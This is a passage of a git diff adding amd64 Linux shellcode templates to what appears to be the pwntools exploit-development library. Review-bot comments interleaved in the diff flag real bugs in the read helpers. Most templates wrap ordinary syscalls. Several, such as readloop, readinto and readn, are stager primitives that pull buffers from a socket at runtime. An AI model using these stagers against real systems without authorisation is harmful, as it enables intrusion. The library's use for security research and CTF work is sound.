${syscall('SYS_ptrace', request, *vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/push.asm b/pwnlib/shellcraft/templates/amd64/linux/push.asm deleted file mode 100644 index 7536542b6..000000000 --- a/pwnlib/shellcraft/templates/amd64/linux/push.asm +++ /dev/null 
@@ -1,21 +0,0 @@ -<% - from pwnlib.shellcraft import amd64 - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context -%> -<%page args="value"/> -<%docstring> - -Thin wrapper around :func:`pwnlib.shellcraft.amd64.push`, which sets -`context.os` to `'linux'` before calling. - -Example: - - >>> print pwnlib.shellcraft.amd64.linux.push('SYS_execve').rstrip() - /* push 'SYS_execve' */ - push 0x3b - - - -% with ctx.local(os = 'linux'): - ${amd64.push(value)} -% endwith diff --git a/pwnlib/shellcraft/templates/amd64/linux/push.asm b/pwnlib/shellcraft/templates/amd64/linux/push.asm new file mode 120000 index 000000000..85ff2b0a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/push.asm @@ -0,0 +1 @@ +../push.asm \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm new file mode 100644 index 000000000..f7120176c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pwrite.asm b/pwnlib/shellcraft/templates/amd64/linux/pwrite.asm new file mode 100644 index 000000000..0411538b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pwrite.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pwritev.asm b/pwnlib/shellcraft/templates/amd64/linux/pwritev.asm new file mode 100644 index 000000000..901aa1e1a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/read.asm b/pwnlib/shellcraft/templates/amd64/linux/read.asm index 21b36ffd8..e58cd11dc 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/read.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/read.asm @@ -1,15 +1,8 @@ - -<% - from pwnlib.shellcraft.amd64.linux import syscall -%> -<%page args="fd, buf, nbytes"/> +<% from pwnlib.shellcraft import amd64 %> +<%page args="fd=0, buffer='rsp', count=8"/> <%docstring> -Invokes the syscall read. See 'man 2 read' for more information. - -Arguments: - fd(int): fd - buf(void): buf - nbytes(size_t): nbytes +Reads data from the file descriptor into the provided buffer. +This is a one-shot and does not fill the request. - ${syscall('SYS_read', fd, buf, nbytes)} + ${amd64.linux.syscall('SYS_read', fd, buffer, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/read_upto.asm b/pwnlib/shellcraft/templates/amd64/linux/read_upto.asm new file mode 100644 index 000000000..1f074c653 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/read_upto.asm 
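Review bot: The `<%page>` line in read.asm renames the keyword parameters from `fd, buf, nbytes` to `fd=0, buffer='rsp', count=8` and the docstring drops its Arguments section, so a caller using `read(buf=..., nbytes=...)` breaks at render time and nothing documents the new defaults. The positional callers in this series (readn.asm, readptr.asm, read_upto.asm) are unaffected, but the docstring should regain an Arguments block giving fd (descriptor to read from, default 0), buffer (register or address the data is written to, default 'rsp') and count (maximum bytes requested, default 8), and say that the byte count actually read is left in rax, which readn.asm relies on. If keyword compatibility matters, `fd=0, buf='rsp', nbytes=8` keeps the old names with the new defaults.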
@@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="fd=0, buffer='rsp', sizereg='rdx'"/> +<%docstring>Reads up to N bytes 8 bytes into the specified register + +${amd64.linux.readptr(sizereg)} +${amd64.linux.read(fd, buffer, sizereg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readahead.asm b/pwnlib/shellcraft/templates/amd64/linux/readahead.asm new file mode 100644 index 000000000..29f51593d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readdir.asm b/pwnlib/shellcraft/templates/amd64/linux/readdir.asm new file mode 100644 index 000000000..a268520d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readinto.asm b/pwnlib/shellcraft/templates/amd64/linux/readinto.asm new file mode 100644 index 000000000..0870d9596 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readinto.asm 
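Review bot: `${amd64.linux.readptr(sizereg)}` in read_upto.asm passes `sizereg` as readptr's first positional parameter, which is `fd` (readptr.asm declares `<%page args="fd=0, target_reg='rdx'"/>`), so the length is read from whatever descriptor number the register string resolves to and lands in the default rdx rather than in `sizereg`; it should be `${amd64.linux.readptr(fd, sizereg)}`. The docstring `Reads up to N bytes 8 bytes into the specified register` is garbled; `Reads an 8-byte length N from fd into sizereg, then reads up to N bytes from fd into buffer` describes what the two lines do. Since readptr leaves the syscall result unchecked, the docstring should also say that N is taken as-is from the descriptor.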
@@ -0,0 +1,22 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="sock=0"/> +<%docstring> +Reads into a buffer of a size and location determined at runtime. +When the shellcode is executing, it should send a pointer and +pointer-width size to determine the location and size of buffer. + +<% +after = common.label("after") +%> + + /* Read address / size tuples from fd ${sock}, and + then fill that buffer. Loop as long as size is nonzero. */ + ${amd64.linux.readptr(sock, 'rsi')} + push rsi + ${amd64.linux.readptr(sock, 'rdx')} + pop rsi + test rdx, rdx + jz ${after} + ${amd64.linux.readn(sock, 'rsi', 'rdx')} + ${after}: \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/readlink.asm b/pwnlib/shellcraft/templates/amd64/linux/readlink.asm new file mode 100644 index 000000000..79581d1ae --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm b/pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm new file mode 100644 index 000000000..debda0c6a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} 
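Review bot: The comment `Loop as long as size is nonzero.` in readinto.asm describes readloop.asm, not this template: readinto reads one address/size pair, skips the read when the size is zero and falls through to `${after}` with no backward jump. The docstring is likewise a copy of readloop's and should mark this as the single-shot form; for the comment, `/* Read one address / size pair from fd ${sock} and fill that buffer; a zero size skips the read. */` matches the code. Neither readptr call checks the syscall's return, so a short read or closed descriptor leaves the placeholder readptr pushes in rsi or rdx and the following readn uses it; the docstring should state that assumption.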
diff --git a/pwnlib/shellcraft/templates/amd64/linux/readloop.asm b/pwnlib/shellcraft/templates/amd64/linux/readloop.asm new file mode 100644 index 000000000..7316f6959 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readloop.asm @@ -0,0 +1,25 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="sock=0"/> +<%docstring> +Reads into a buffer of a size and location determined at runtime. +When the shellcode is executing, it should send a pointer and +pointer-width size to determine the location and size of buffer. + +<% +after = common.label("after") +before = common.label("before") +%> + +${before}: + /* Read address / size tuples from fd ${sock}, and + then fill that buffer. Loop as long as size is nonzero. */ + ${amd64.linux.readptr(sock, 'rsi')} + push rsi + ${amd64.linux.readptr(sock, 'rdx')} + pop rsi + test rdx, rdx + jz ${after} + ${amd64.linux.readn(sock, 'rsi', 'rdx')} + jmp ${before} +${after}: \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/readn.asm b/pwnlib/shellcraft/templates/amd64/linux/readn.asm new file mode 100644 index 000000000..8c55c4b4e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readn.asm @@ -0,0 +1,23 @@ +<% + from pwnlib.shellcraft.amd64.linux import read + from pwnlib.shellcraft.amd64 import setregs + from pwnlib.shellcraft import common +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Reads exactly nbytes bytes from file descriptor fd into the buffer buf. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + +<% +readn_loop = common.label('readn_loop') +%> + ${setregs({'rsi': buf, 'rdx': nbytes})} +${readn_loop}: + ${read(fd, 'rsi', 'rdx')} + add rsi, rax + sub rdx, rax + jnz ${readn_loop} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readptr.asm b/pwnlib/shellcraft/templates/amd64/linux/readptr.asm new file mode 100644 index 000000000..75e2c2a71 --- /dev/null 
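Review bot: The loop in readn.asm never terminates when `read` returns 0 (end of file): `sub rdx, rax` leaves rdx unchanged and `jnz ${readn_loop}` branches back, and on a negative return (-errno in rax) `add rsi, rax` moves the pointer backwards while rdx grows, so the docstring's `Reads exactly nbytes bytes` only holds while the descriptor keeps delivering data. A guard on rax between the read and the pointer arithmetic exits on EOF or error; it needs a second label from `common.label` plus `test rax, rax` / `jle`, shown below. The docstring should then say that the loop stops early on EOF or error and that rdx holds the remaining byte count at that point.
```mako
<%
readn_loop = common.label('readn_loop')
readn_done = common.label('readn_done')
%>
## … unchanged: setregs and the ${readn_loop}: label …
    ${read(fd, 'rsi', 'rdx')}
    test rax, rax
    jle ${readn_done}
## … unchanged: add rsi, rax / sub rdx, rax / jnz ${readn_loop} …
${readn_done}:
```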
+++ b/pwnlib/shellcraft/templates/amd64/linux/readptr.asm @@ -0,0 +1,7 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="fd=0, target_reg='rdx'"/> +<%docstring>Reads 8 bytes into the specified register + + push 1 + ${amd64.linux.read(fd, 'rsp', 8)} + pop ${target_reg} diff --git a/pwnlib/shellcraft/templates/amd64/linux/readv.asm b/pwnlib/shellcraft/templates/amd64/linux/readv.asm new file mode 100644 index 000000000..dc0fd0c49 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recv.asm b/pwnlib/shellcraft/templates/amd64/linux/recv.asm new file mode 100644 index 000000000..6e6534aec --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm b/pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm new file mode 100644 index 000000000..5c6483079 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recvfrom.asm 
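Review bot: readptr.asm's docstring `Reads 8 bytes into the specified register` omits what callers need to know: `push 1` reserves a stack slot pre-filled with 1, a single `read(fd, 'rsp', 8)` overwrites it, and `pop ${target_reg}` takes whatever is there, so a short read or failed syscall leaves a mix of the placeholder and partial input in the register with no indication. Because read_upto.asm calls this with one positional argument, the `fd, target_reg` parameter order is worth spelling out too. Suggested docstring: `Reads 8 bytes from fd into target_reg via a temporary stack slot; a single read syscall whose return value is not checked.`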
@@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm new file mode 100644 index 000000000..4a87cf150 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm new file mode 100644 index 000000000..379c18271 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm new file mode 100644 index 000000000..484b16d69 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/remap_file_pages.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/rename.asm b/pwnlib/shellcraft/templates/amd64/linux/rename.asm new file mode 100644 index 000000000..126a2273d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/renameat.asm b/pwnlib/shellcraft/templates/amd64/linux/renameat.asm new file mode 100644 index 000000000..19f57b43a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/rmdir.asm b/pwnlib/shellcraft/templates/amd64/linux/rmdir.asm new file mode 100644 index 000000000..4fa3fb555 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/rmdir.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..27b2a736e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..a93ca75f0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm new file mode 100644 index 000000000..0c240351f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm new file mode 100644 index 000000000..ccd349996 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm new file mode 100644 index 000000000..5a1aad669 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..707bb8da6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm new file mode 100644 index 000000000..58dc40019 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm new file mode 100644 index 000000000..51304f254 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm new file mode 100644 index 000000000..8fadcc929 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm new file mode 100644 index 000000000..3518171f2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/select.asm b/pwnlib/shellcraft/templates/amd64/linux/select.asm new file mode 100644 index 000000000..9eb7f5b27 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sendfile.asm b/pwnlib/shellcraft/templates/amd64/linux/sendfile.asm new file mode 100644 index 000000000..df39dbb94 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sendfile.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm b/pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm new file mode 100644 index 000000000..00978f96d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm b/pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm new file mode 100644 index 000000000..57305f3ff --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setgid.asm b/pwnlib/shellcraft/templates/amd64/linux/setgid.asm new file mode 100644 index 000000000..ee7396962 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setgid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setgroups.asm b/pwnlib/shellcraft/templates/amd64/linux/setgroups.asm new file mode 100644 index 000000000..1c3b745a7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sethostname.asm b/pwnlib/shellcraft/templates/amd64/linux/sethostname.asm new file mode 100644 index 000000000..8a618783f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setitimer.asm b/pwnlib/shellcraft/templates/amd64/linux/setitimer.asm new file mode 100644 index 000000000..bcd844e00 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/setpgid.asm b/pwnlib/shellcraft/templates/amd64/linux/setpgid.asm new file mode 100644 index 000000000..4f46cf653 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setpriority.asm b/pwnlib/shellcraft/templates/amd64/linux/setpriority.asm new file mode 100644 index 000000000..02bd28501 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setresgid.asm 